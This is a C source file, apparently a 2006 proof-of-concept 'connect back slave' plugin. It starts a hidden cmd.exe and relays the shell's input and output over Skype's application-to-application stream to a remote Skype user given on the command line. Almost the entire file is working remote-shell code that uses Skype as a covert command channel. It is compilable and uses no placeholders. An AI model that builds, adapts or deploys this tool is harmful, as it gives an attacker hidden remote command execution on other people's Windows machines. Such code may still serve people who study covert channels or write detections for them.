/*
 * Skype cmd.exe plugin v0.1 - "connect back slave" module (c) 2006 Kostya Kortchinsky - EADS/DCR/STI/C
 * Compile with "cl /W3 plugin_slave.c /MT"
 */

#include <windows.h>
#include <stdio.h>
#include <process.h>

#pragma comment(lib, "rpcrt4.lib")
#pragma comment(lib, "user32.lib")
#pragma comment(lib, "advapi32.lib")

HWND hInit_MainWindowHandle;
HINSTANCE hInit_ProcessHandle;
char acInit_WindowClassName[128];
HANDLE hGlobal_ThreadShutdownEvent;
BOOL volatile fGlobal_ThreadRunning = TRUE;
UINT uiGlobal_MsgID_SkypeControlAPIAttach;
UINT uiGlobal_MsgID_SkypeControlAPIDiscover;
HWND hGlobal_SkypeAPIWindowHandle = NULL;

enum {
	SKYPECONTROLAPI_ATTACH_SUCCESS = 0,
	SKYPECONTROLAPI_ATTACH_PENDING_AUTHORIZATION = 1,
	SKYPECONTROLAPI_ATTACH_REFUSED = 2,
	SKYPECONTROLAPI_ATTACH_NOT_AVAILABLE = 3,
	SKYPECONTROLAPI_ATTACH_API_AVAILABLE = 0x8001
};

char szMessageCreate[] = "CREATE APPLICATION minishell";
char szMessageConnect[] = "ALTER APPLICATION minishell CONNECT ";
char szMessageConnecting[] = "APPLICATION minishell CONNECTING ";
char szMessageStreams[] = "APPLICATION minishell STREAMS ";
char szMessageDelete[] = "DELETE APPLICATION minishell";
char szMessageReceived[] = "APPLICATION minishell RECEIVED ";
char szMessageRead[] = "ALTER APPLICATION minishell READ ";
char szMessageWrite[] = "ALTER APPLICATION minishell WRITE ";
char szMessageSending[] = "APPLICATION minishell SENDING ";
char szMessageDisconnect[] = "ALTER APPLICATION minishell DISCONNECT ";

static BYTE szUser[56], szStream[64], szAP2APMessage[1152];

HANDLE hNewStdInput = NULL, hNewStdOutput = NULL, hReadStdOutput = NULL, hWriteStdInput = NULL;

void __cdecl CreateCmd(void *pUnused)
{
	STARTUPINFO StartupInfo;
	PROCESS_INFORMATION ProcessInformation;
	SECURITY_ATTRIBUTES SecurityAttributes;
	COPYDATASTRUCT oCopyData;
	DWORD dwExitCode = 0, dwBytesRead, dwTotalBytesAvailable;
	BYTE szBuffer[1024];
	
	oCopyData.dwData = 0;
	SecurityAttributes.lpSecurityDescriptor = NULL;
	SecurityAttributes.nLength = sizeof(SecurityAttributes);
	SecurityAttributes.bInheritHandle = TRUE;
	
	if (CreatePipe(&hNewStdInput, &hWriteStdInput, &SecurityAttributes, 0) == FALSE)
		goto Done;
	if (CreatePipe(&hReadStdOutput, &hNewStdOutput, &SecurityAttributes, 0) == FALSE)
		goto Done;
	
	memset(&StartupInfo, 0, sizeof(StartupInfo));
	StartupInfo.cb = sizeof(StartupInfo);
	StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
	StartupInfo.wShowWindow = SW_HIDE;
	StartupInfo.hStdOutput = hNewStdOutput;
	StartupInfo.hStdError = hNewStdOutput;
	StartupInfo.hStdInput = hNewStdInput;
	
	if (CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &StartupInfo, &ProcessInformation) == FALSE)
		goto Done;
	
	while (TRUE) {
		GetExitCodeProcess(ProcessInformation.hProcess, &dwExitCode);
		if (dwExitCode != STILL_ACTIVE)
			break;
		PeekNamedPipe(hReadStdOutput, szBuffer, sizeof(szBuffer) - 1, &dwBytesRead, &dwTotalBytesAvailable, NULL);
		if (dwBytesRead != 0) {
			memset(szBuffer, 0, sizeof(szBuffer));
			if (dwTotalBytesAvailable > (sizeof(szBuffer) - 1)) {
				while (dwBytesRead >= (sizeof(szBuffer) - 1)) {
					ReadFile(hReadStdOutput, szBuffer, sizeof(szBuffer) - 1, &dwBytesRead, NULL);
					_snprintf(szAP2APMessage, sizeof(szAP2APMessage) - 1, "%s%s %s", szMessageWrite, szStream, szBuffer);
					oCopyData.lpData = szAP2APMessage;
					oCopyData.cbData = strlen(oCopyData.lpData) + 1;
					if (SendMessage(hGlobal_SkypeAPIWindowHandle, WM_COPYDATA, (WPARAM)hInit_MainWindowHandle, (LPARAM)&oCopyData) == FALSE)
						hGlobal_SkypeAPIWindowHandle = NULL;
					memset(szBuffer, 0, sizeof(szBuffer));
				}
			}
			else {
				ReadFile(hReadStdOutput, szBuffer, sizeof(szBuffer) - 1, &dwBytesRead, NULL);
				_snprintf(szAP2APMessage, sizeof(szAP2APMessage) - 1, "%s%s %s", szMessageWrite, szStream, szBuffer);
				oCopyData.lpData = szAP2APMessage;
				oCopyData.cbData = strlen(oCopyData.lpData) + 1;
				if (SendMessage(hGlobal_SkypeAPIWindowHandle, WM_COPYDATA, (WPARAM)hInit_MainWindowHandle, (LPARAM)&oCopyData) == FALSE)
					hGlobal_SkypeAPIWindowHandle = NULL;
			}
		}
		Sleep(100);
	}
	CloseHandle(ProcessInformation.hThread);
	CloseHandle(ProcessInformation.hProcess);

Done:

	if (hNewStdInput != NULL)
		CloseHandle(hNewStdInput), hNewStdInput = NULL;
	if (hNewStdOutput != NULL)
		CloseHandle(hNewStdOutput), hNewStdOutput = NULL;
	if (hReadStdOutput != NULL)
		CloseHandle(hReadStdOutput), hReadStdOutput = NULL;
	if (hWriteStdInput != NULL)
		CloseHandle(hWriteStdInput), hWriteStdInput = NULL;

	strcpy(szBuffer, szMessageDisconnect);
	strcat(szBuffer, szStream);
	oCopyData.lpData = szBuffer;
	oCopyData.cbData = strlen(oCopyData.lpData) + 1;
	if (SendMessage(hGlobal_SkypeAPIWindowHandle, WM_COPYDATA, (WPARAM)hInit_MainWindowHandle, (LPARAM)&oCopyData) == FALSE)
		hGlobal_SkypeAPIWindowHandle = NULL;
}

void ProcessMessage(PCOPYDATASTRUCT poCopyData)
{
	COPYDATASTRUCT oCopyData;
	BYTE szBuffer[1152];
	DWORD dwNumberOfBytesWritten;

	oCopyData.dwData = 0;
	oCopyData.lpData = NULL;
	memset(szBuffer, 0, sizeof(szBuffer));
	if (stricmp(poCopyData->lpData, szMessageCreate) == 0) {
		OutputDebugString("[DEBUG] Application registration successful.\n");
		strcpy(szBuffer, szMessageConnect);
		strcat(szBuffer, szUser);
		oCopyData.lpData = szBuffer;
	}
	else if (stricmp(poCopyData->lpData, szMessageConnecting) == 0) {
		OutputDebugString("[DEBUG] Connection successful.\n");
	}
	else if (strnicmp(poCopyData->lpData, szMessageStreams, strlen(szMessageStreams)) == 0) {
		memset(szStream, 0, sizeof(szStream));
		strncpy(szStream, &(((char *)(poCopyData->lpData))[strlen(szMessageStreams)]), sizeof(szStream) - 1);
		if (strlen(szStream) == 0)
			OutputDebugString("[DEBUG] Stream closed.\n");
		else {
			OutputDebugString(szStream);
			_beginthread(CreateCmd, 0, NULL);
		}
	}
	else if (strnicmp(poCopyData->lpData, szMessageReceived, strlen(szMessageReceived)) == 0) {
		if (strnicmp(szStream, &(((char *)(poCopyData->lpData))[strlen(szMessageReceived)]), strlen(szStream)) == 0) {
			OutputDebugString("[DEBUG] Incoming message.\n");
			_snprintf(szBuffer, sizeof(szBuffer) - 1, "%s%s", szMessageRead, szStream);
			oCopyData.lpData = szBuffer;
		}
	}
	else if (strnicmp(poCopyData->lpData, szMessageRead, strlen(szMessageRead)) == 0) {
		if (strnicmp(szStream, &(((char *)(poCopyData->lpData))[strlen(szMessageRead)]), strlen(szStream)) == 0) {
			OutputDebugString("[DEBUG] Message received.\n");
			strncpy(szBuffer, &(((char *)(poCopyData->lpData))[strlen(szMessageRead) + strlen(szStream) + 1]), sizeof(szBuffer) - 1);
			if (hWriteStdInput != NULL) {
				WriteFile(hWriteStdInput, szBuffer, strlen(szBuffer), &dwNumberOfBytesWritten, NULL);
				if (szBuffer[strlen(szBuffer) - 1] != '\n')
					WriteFile(hWriteStdInput, "\r\n", 2, &dwNumberOfBytesWritten, NULL);
			}
			else
				OutputDebugString("[DEBUG] No named pipe available.\n");
		}
	}
	else if (strnicmp(poCopyData->lpData, szMessageDisconnect, strlen(szMessageDisconnect)) == 0) {
		if (strnicmp(szStream, &(((char *)(poCopyData->lpData))[strlen(szMessageDisconnect)]), strlen(szStream)) == 0) {
			OutputDebugString("[DEBUG] Disconnection successful.\n");
			oCopyData.lpData = szMessageDelete;
		}
	}
	else if (stricmp(poCopyData->lpData, szMessageDelete) == 0) {
		OutputDebugString("[DEBUG] Application successfully deleted.\n");
		PostMessage(hInit_MainWindowHandle, WM_CLOSE, 0, 0);
		SetEvent(hGlobal_ThreadShutdownEvent);
		fGlobal_ThreadRunning = FALSE;
	}
	if (oCopyData.lpData != NULL) {
		oCopyData.cbData = strlen(oCopyData.lpData) + 1;
		if (SendMessage(hGlobal_SkypeAPIWindowHandle, WM_COPYDATA, (WPARAM)hInit_MainWindowHandle, (LPARAM)&oCopyData) == FALSE)
			hGlobal_SkypeAPIWindowHandle = NULL;
	}
}

static LRESULT APIENTRY SkypeAPITest_Windows_WindowProc(HWND hWindow, UINT uiMessage, WPARAM uiParam, LPARAM ulParam)
{
	LRESULT lReturnCode;
	BOOL fIssueDefProc;
	COPYDATASTRUCT oCopyData;

	lReturnCode = 0;
	fIssueDefProc = FALSE;
	oCopyData.dwData = 0;
	switch(uiMessage) {
		case WM_DESTROY:
			hInit_MainWindowHandle = NULL;
			PostQuitMessage(0);
			break;
		case WM_COPYDATA:
			if (hGlobal_SkypeAPIWindowHandle == (HWND)uiParam) {
				ProcessMessage((PCOPYDATASTRUCT)ulParam);
				lReturnCode = 1;
			}
			break;
		default:
			if(uiMessage == uiGlobal_MsgID_SkypeControlAPIAttach) {
				switch(ulParam) {
					case SKYPECONTROLAPI_ATTACH_SUCCESS:
						hGlobal_SkypeAPIWindowHandle = (HWND)uiParam;
						oCopyData.lpData = szMessageCreate;
						oCopyData.cbData = strlen(oCopyData.lpData) + 1;
						if (SendMessage(hGlobal_SkypeAPIWindowHandle, WM_COPYDATA, (WPARAM)hInit_MainWindowHandle, (LPARAM)&oCopyData) == FALSE) {
							hGlobal_SkypeAPIWindowHandle = NULL;
						}
						break;
					case SKYPECONTROLAPI_ATTACH_PENDING_AUTHORIZATION:
					case SKYPECONTROLAPI_ATTACH_REFUSED:
					case SKYPECONTROLAPI_ATTACH_NOT_AVAILABLE:
					case SKYPECONTROLAPI_ATTACH_API_AVAILABLE:
						break;
				}
				lReturnCode = 1;
				break;
			}
			fIssueDefProc = TRUE;
			break;
	}
	if (fIssueDefProc)
		lReturnCode = DefWindowProc(hWindow, uiMessage, uiParam, ulParam);
	return (lReturnCode);
}

BOOL Initialize_CreateWindowClass(void)
{
	unsigned char *paucUUIDString;
	RPC_STATUS lUUIDResult;
	BOOL fReturnStatus;
	UUID oUUID;

	fReturnStatus = FALSE;
	lUUIDResult = UuidCreate(&oUUID);
	hInit_ProcessHandle = (HINSTANCE)OpenProcess(PROCESS_DUP_HANDLE, FALSE, GetCurrentProcessId());
	if (hInit_ProcessHandle != NULL && (lUUIDResult == RPC_S_OK || lUUIDResult == RPC_S_UUID_LOCAL_ONLY)) {
		if(UuidToString(&oUUID, &paucUUIDString) == RPC_S_OK) {
			WNDCLASS oWindowClass;
			strcpy(acInit_WindowClassName, "Skype-API-Test-");
			strcat(acInit_WindowClassName, (char *)paucUUIDString);

			oWindowClass.style = CS_HREDRAW | CS_VREDRAW | CS_DBLCLKS;
			oWindowClass.lpfnWndProc = (WNDPROC)&SkypeAPITest_Windows_WindowProc;
			oWindowClass.cbClsExtra = 0;
			oWindowClass.cbWndExtra = 0;
			oWindowClass.hInstance = hInit_ProcessHandle;
			oWindowClass.hIcon = NULL;
			oWindowClass.hCursor = NULL;
			oWindowClass.hbrBackground = NULL;
			oWindowClass.lpszMenuName = NULL;
			oWindowClass.lpszClassName = acInit_WindowClassName;

			if (RegisterClass(&oWindowClass) != 0)
				fReturnStatus = TRUE;
			RpcStringFree(&paucUUIDString);
		}
	}
	if (fReturnStatus == FALSE)
		CloseHandle(hInit_ProcessHandle), hInit_ProcessHandle = NULL;
	return (fReturnStatus);
}

void DeInitialize_DestroyWindowClass(void)
{
	UnregisterClass(acInit_WindowClassName, hInit_ProcessHandle);
	CloseHandle(hInit_ProcessHandle), hInit_ProcessHandle = NULL;
}

BOOL Initialize_CreateMainWindow(void)
{
	hInit_MainWindowHandle = CreateWindowEx(WS_EX_APPWINDOW | WS_EX_WINDOWEDGE,
		acInit_WindowClassName, "", WS_BORDER | WS_SYSMENU | WS_MINIMIZEBOX,
		CW_USEDEFAULT, CW_USEDEFAULT, 128, 128, NULL, 0, hInit_ProcessHandle, 0);
	return (hInit_MainWindowHandle != NULL ? TRUE : FALSE);
}

void DeInitialize_DestroyMainWindow(void)
{
	if (hInit_MainWindowHandle != NULL)
		DestroyWindow(hInit_MainWindowHandle), hInit_MainWindowHandle = NULL;
}

void Global_MessageLoop(void)
{
	MSG oMessage;

	while (GetMessage(&oMessage, 0, 0, 0) != FALSE) {
		TranslateMessage(&oMessage);
		DispatchMessage(&oMessage);
	}
}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow)
{
	if (strlen(szCmdLine) > (sizeof(szUser) - 1) || strlen(szCmdLine) == 0)
		return -1;
	strcpy(szUser, szCmdLine);

	uiGlobal_MsgID_SkypeControlAPIAttach = RegisterWindowMessage("SkypeControlAPIAttach");
	uiGlobal_MsgID_SkypeControlAPIDiscover = RegisterWindowMessage("SkypeControlAPIDiscover");
	if (uiGlobal_MsgID_SkypeControlAPIAttach != 0 && uiGlobal_MsgID_SkypeControlAPIDiscover != 0) {
		if (Initialize_CreateWindowClass()) {
			if (Initialize_CreateMainWindow()) {
				hGlobal_ThreadShutdownEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
				if (hGlobal_ThreadShutdownEvent != NULL) {
					SendMessage(HWND_BROADCAST, uiGlobal_MsgID_SkypeControlAPIDiscover, (WPARAM)hInit_MainWindowHandle, 0);
					Global_MessageLoop();
					WaitForSingleObject(hGlobal_ThreadShutdownEvent, INFINITE);
					CloseHandle(hGlobal_ThreadShutdownEvent);
				}
				DeInitialize_DestroyMainWindow();
			}
			DeInitialize_DestroyWindowClass();
		}
	}

	return 0;
}
